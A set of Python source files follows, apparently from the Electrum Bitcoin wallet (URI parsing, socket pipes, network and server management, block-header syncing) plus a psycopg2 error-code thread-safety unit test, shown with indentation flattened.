return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcoin':
raise BaseException("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid bitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
elif e[0] in ['timed out', 'The write operation timed out']:
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
test_errcodes.py
|
#!/usr/bin/env python
# test_errcodes.py - unit test for psycopg2.errcodes module
#
# Copyright (C) 2015 Daniele Varrazzo <daniele.varrazzo@gmail.com>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
from .testutils import unittest, ConnectingTestCase, slow
try:
reload
except NameError:
try:
from importlib import reload
except ImportError:
from imp import reload
from threading import Thread
from psycopg2 import errorcodes
class ErrocodeTests(ConnectingTestCase):
@slow
def test_lookup_threadsafe(self):
# Increase if it does not fail with KeyError
MAX_CYCLES = 2000
errs = []
def f(pg_code="40001"):
try:
errorcodes.lookup(pg_code)
except Exception as e:
errs.append(e)
for __ in range(MAX_CYCLES):
reload(errorcodes)
(t1, t2) = (Thread(target=f), Thread(target=f))
(t1.start(), t2.start())
(t1.join(), t2.join())
if errs:
self.fail(
"raised %s errors in %s cycles (first is %s %s)"
% (len(errs), MAX_CYCLES, errs[0].__class__.__name__, errs[0])
)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
network.py
|
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import queue
import os
import stat
import errno
import random
import re
import select
from collections import defaultdict
import threading
import socket
import json
import socks
from . import util
from . import bitcoin
from .bitcoin import *
from .networks import NetworkConstants
from .interface import Connection, Interface
from . import blockchain
from .version import PACKAGE_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
from .version import PROTOCOL_VERSION
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = bitcoin.NetworkConstants.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = bitcoin.NetworkConstants.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'), p.get('host'), p.get('port'),
p.get('user', ''), p.get('password', '')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
def deserialize_server(server_str):
host, port, protocol = str(server_str).rsplit(':', 2)
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server', None)
# Sanitize default server
if self.default_server:
try:
deserialize_server(self.default_server)
except:
self.print_error('Warning: failed to parse server-string; falling back to random.')
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
dir_path = os.path.join( self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
os.chmod(dir_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# subscriptions and requests
self.subscribed_addresses = set()
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def recent_servers_file(self):
return os.path.join(self.config.path, "recent-servers")
def read_recent_servers(self):
if not self.config.path:
return []
try:
with open(self.recent_servers_file(), "r", encoding='utf-8') as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(self.recent_servers_file(), "w", encoding='utf-8') as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
self.request_fee_estimates()
self.queue_request('blockchain.relayfee', [])
for h in self.subscribed_addresses:
self.queue_request('blockchain.scripthash.subscribe', [h])
def request_fee_estimates(self):
self.config.requested_fee_estimates()
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = bitcoin.NetworkConstants.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if (not server in self.interfaces and not server in self.connecting):
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
self.disconnected_servers = set([])
self.protocol = protocol
self.set_proxy(proxy)
self.start_interfaces()
def stop_network(self):
self.print_error("stopping network")
for interface in list(self.interfaces.values()):
self.close_interface(interface)
if self.interface:
self.close_interface(self.interface)
assert self.interface is None
assert not self.interfaces
self.connecting = set()
# Get a new queue - no old pending connections thanks!
self.socket_queue = queue.Queue()
def set_parameters(self, host, port, protocol, proxy, auto_connect):
proxy_str = serialize_proxy(proxy)
server = serialize_server(host, port, protocol)
# sanitize parameters
try:
deserialize_server(serialize_server(host, port, protocol))
if proxy:
proxy_modes.index(proxy["mode"]) + 1
int(proxy['port'])
except:
return
self.config.set_key('auto_connect', auto_connect, False)
self.config.set_key("proxy", proxy_str, False)
self.config.set_key("server", server, True)
# abort if changes were not allowed by config
if self.config.get('server') != server or self.config.get('proxy') != proxy_str:
return
self.auto_connect = auto_connect
if self.proxy != proxy or self.protocol != protocol:
# Restart the network defaulting to the given server
self.stop_network()
self.default_server = server
self.start_network(protocol, proxy)
elif self.default_server != server:
self.switch_to_interface(server)
else:
self.switch_lagging_interface()
self.notify('updated')
def switch_to_random_interface(self):
'''Switch to a random connected server other than the current one'''
servers = self.get_interfaces() # Those in connected state
if self.default_server in servers:
servers.remove(self.default_server)
if servers:
self.switch_to_interface(random.choice(servers))
def switch_lagging_interface(self):
'''If auto_connect and lagging, switch interface'''
if self.server_is_lagging() and self.auto_connect:
# switch to one that has the correct header (not height)
header = self.blockchain().read_header(self.get_local_height())
filtered = list(map(lambda x:x[0], filter(lambda x: x[1].tip_header==header, self.interfaces.items())))
if filtered:
choice = random.choice(filtered)
self.switch_to_interface(choice)
def switch_to_interface(self, server):
'''Switch to server as our interface. If no connection exists nor
being opened, start a thread to connect. The actual switch will
happen on receipt of the connection notification. Do nothing
if server already is our interface.'''
self.default_server = server
if server not in self.interfaces:
self.interface = None
self.start_interface(server)
return
i = self.interfaces[server]
if self.interface != i:
self.print_error("switching to", server)
# stop any current interface in order to terminate subscriptions
# fixme: we don't want to close headers sub
#self.close_interface(self.interface)
self.interface = i
self.send_subscriptions()
self.set_status('connected')
self.notify('updated')
def close_interface(self, interface):
if interface:
if interface.server in self.interfaces:
self.interfaces.pop(interface.server)
if interface.server == self.default_server:
self.interface = None
interface.close()
def add_recent_server(self, server):
# list is ordered
if server in self.recent_servers:
self.recent_servers.remove(server)
self.recent_servers.insert(0, server)
self.recent_servers = self.recent_servers[0:20]
self.save_recent_servers()
def process_response(self, interface, response, callbacks):
if self.debug:
self.print_error("<--", response)
error = response.get('error')
result = response.get('result')
method = response.get('method')
params = response.get('params')
# We handle some responses; return the rest to the client.
if method == 'server.version':
interface.server_version = result
elif method == 'blockchain.headers.subscribe':
if error is None:
self.on_notify_header(interface, result)
elif method == 'server.peers.subscribe':
if error is None:
self.irc_servers = parse_servers(result)
self.notify('servers')
elif method == 'server.banner':
if error is None:
self.banner = result
self.notify('banner')
elif method == 'server.donation_address':
if error is None:
self.donation_address = result
elif method == 'blockchain.estimatefee':
if error is None and result > 0:
i = params[0]
fee = int(result*COIN)
self.config.update_fee_estimates(i, fee)
self.print_error("fee_estimates[%d]" % i, fee)
self.notify('fee')
elif method == 'blockchain.relayfee':
if error is None:
self.relay_fee = int(result * COIN)
self.print_error("relayfee", self.relay_fee)
elif method == 'blockchain.block.headers':
self.on_block_headers(interface, response)
elif method == 'blockchain.block.get_header':
self.on_get_header(interface, response)
for callback in callbacks:
callback(response)
def get_index(self, method, params):
""" hashable index for subscriptions and cache"""
return str(method) + (':' + str(params[0]) if params else '')
def process_responses(self, interface):
responses = interface.get_responses()
for request, response in responses:
if request:
method, params, message_id = request
k = self.get_index(method, params)
# client requests go through self.send() with a
# callback, are only sent to the current interface,
# and are placed in the unanswered_requests dictionary
client_req = self.unanswered_requests.pop(message_id, None)
if client_req:
assert interface == self.interface
callbacks = [client_req[2]]
else:
# fixme: will only work for subscriptions
k = self.get_index(method, params)
callbacks = self.subscriptions.get(k, [])
# Copy the request method and params to the response
response['method'] = method
response['params'] = params
# Only once we've received a response to an addr subscription
# add it to the list; avoids double-sends on reconnection
if method == 'blockchain.scripthash.subscribe':
self.subscribed_addresses.add(params[0])
else:
if not response: # Closed remotely / misbehaving
self.connection_down(interface.server)
break
# Rewrite response shape to match subscription request response
method = response.get('method')
params = response.get('params')
k = self.get_index(method, params)
if method == 'blockchain.headers.subscribe':
response['result'] = params[0]
response['params'] = []
elif method == 'blockchain.scripthash.subscribe':
response['params'] = [params[0]] # addr
response['result'] = params[1]
callbacks = self.subscriptions.get(k, [])
# update cache if it's a subscription
if method.endswith('.subscribe'):
self.sub_cache[k] = response
# Response is now in canonical form
self.process_response(interface, response, callbacks)
def subscribe_to_scripthashes(self, scripthashes, callback):
msgs = [('blockchain.scripthash.subscribe', [sh])
for sh in scripthashes]
self.send(msgs, callback)
def request_scripthash_history(self, sh, callback):
self.send([('blockchain.scripthash.get_history', [sh])], callback)
def send(self, messages, callback):
'''Messages is a list of (method, params) tuples'''
messages = list(messages)
with self.lock:
self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
# server.version should be the first message
params = [PACKAGE_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
self.queue_request('blockchain.headers.subscribe', [True], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
self.queue_request('server.ping', [], interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
self.request_fee_estimates()
def request_chunk(self, interface, idx):
interface.print_error("requesting chunk %d" % idx)
height = idx * 2016
self.queue_request('blockchain.block.headers', [height, 2016],
interface)
interface.request = idx
interface.req_time = time.time()
def on_block_headers(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
interface.print_error(error or 'bad response')
return
# Ignore unsolicited chunks
index = interface.request
if index * 2016 != params[0]:
return
hexdata = result['hex']
connect = interface.blockchain.connect_chunk(index, hexdata)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
if interface.request != height:
interface.print_error("unsolicited header",interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write(b'', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // 2016)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
if interface.request and time.time() - interface.request_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except socket.error as e:
# TODO: py3, get code from e
code = None
if code == errno.EINTR:
return
raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
b = self.blockchains[0]
if b.get_hash(0) == bitcoin.NetworkConstants.GENESIS:
self.downloading_headers = False
return
filename = b.path()
def download_thread():
try:
import urllib.request, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.NetworkConstants.HEADERS_URL)
urllib.request.urlretrieve(bitcoin.NetworkConstants.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
b = self.blockchains[0]
